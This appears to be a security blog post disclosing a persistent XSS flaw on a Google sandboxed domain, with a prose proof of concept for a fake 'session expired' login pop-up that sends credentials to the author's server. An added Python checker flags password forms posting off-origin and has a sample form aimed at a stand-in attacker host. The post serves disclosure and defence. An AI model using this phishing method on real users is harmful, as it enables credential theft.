Exploiting Google persistent XSS vulnerability for phishing


Yesterday we reported on how Bug Bounty programs can play unfair with hackers and researchers: hackers submit their legitimate findings to companies and, no surprise, get replies like “Someone else already reported this, you are not eligible for a Bounty”. But the main issue is: if companies are really aware of the issue, then why have they not fixed it yet?

Today we are going to talk about Google, and how an ignored vulnerability can be brilliantly crafted and exploited by hackers for phishing users.
On 11th September this year, I reported a persistent XSS vulnerability in Google, and the reply from the Google Security Team was: “It seems the XSS you reported actually executes on one of our sandboxed domains (googleusercontent.com). The sandboxed domain does not contain any session cookies for google services, nor does it have access to any Google.com data.”
I said it was okay: if they are sure that it is not exploitable and is on a sandboxed domain, then the conversation is over. Now, two months later, yesterday another Bulgarian hacker going by the name “Keeper” reported to me that the vulnerability is still working even after multiple submissions to Google. Now I was surprised to see how serious the Google team can be about the security of their users.
I have successfully exploited a Google vulnerability which has been ignored by Google itself for the last 2 months.

————Proof of Concept————

1.) Phishing pages created on Google, here
2.) The user will land on a page whose URL in the address bar is Google.com/______
3.) Using the cross-site scripting vulnerability I generate a pop-up that convinces a Google user that their cookies have expired and that they have to log in again to access the next pages (please do not enter your original username / password)
4.) The phishing login form is designed using a Google service itself and points to my EVIL server.
5.) Once the user tries to log in, all credentials are saved there and the page shows “Done” without any reload.

This phishing page is hosted on the same sandbox domain, where an attacker can’t steal cookies, but it is enough for a perfect phishing attack. I hope the respected Google team will now fix it asap after open disclosure with a demonstration.
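As an added example (not code from the original post or from Google), the check a sandboxed content host is missing in the scenario above: parse a page and flag every form holding a password field whose action resolves to an origin other than the page's own, which is what a `Content-Security-Policy: form-action 'self'` header on that host would block. The hostnames and the sample HTML are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a page on a sandboxed user-content host whose "session
# expired" form posts credentials to a foreign server. Hostnames are placeholders.
SAMPLE_PAGE_URL = "https://sandbox.example-usercontent.test/page/123"
SAMPLE_HTML = """
<p>Your session has expired. Please sign in again.</p>
<form action="https://evil.example.test/collect" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<form action="/search" method="get"><input name="q"></form>
<form method="post"><input name="pw" type="PASSWORD"></form>
"""

def origin(url):
    """(scheme, host, port): the part of a URL the same-origin policy compares."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.hostname or "", parts.port)

class _FormCollector(HTMLParser):
    """Records every <form> action and whether the form holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []        # list of (action, has_password)
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = [attrs.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None

def offsite_credential_forms(html, page_url):
    """Resolved action URLs of password forms that submit to another origin,
    i.e. what a Content-Security-Policy 'form-action' self-only policy would block."""
    parser = _FormCollector()
    parser.feed(html)
    parser.close()
    page_origin = origin(page_url)
    # An empty or relative action resolves against the page URL, so it stays on-origin.
    return [urljoin(page_url, action) for action, has_password in parser.forms
            if has_password and origin(urljoin(page_url, action)) != page_origin]
```

Run against the constructed sample, only the form posting to the foreign host is reported; the relative search form and the action-less password form are left alone.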

Update: A Google representative quickly replied about the issue and defended themselves by saying that “It can’t be used for phishing” because it is hosted on a separate host name. Question from readers: Can’t Google see that the URL in the browser is “Google.com/—–”, potentially enough for phishing?

By definition, phishing is tricking users into believing that they are on the right webpage, and the demonstration successfully showed this.

Google also said that hosting such content on Google services violates their terms of service, but please note that we already followed the non-disclosure route two months ago, and that is enough time to take action to fix the bug. Disclosing the exploitation with a demo is now necessary to make them believe that – It WORKS !!

Note for Google: Google can call it “Same origin policy” or a “violation of services”; for an attacker and a victim your policies are nothing. Even the source of the POC is not hosted on Google, we are calling it from our server, so we are not violating any of your policies. We respect you and are trying to help you understand the RISK, and to warn our readers to be aware of such phishing attacks.
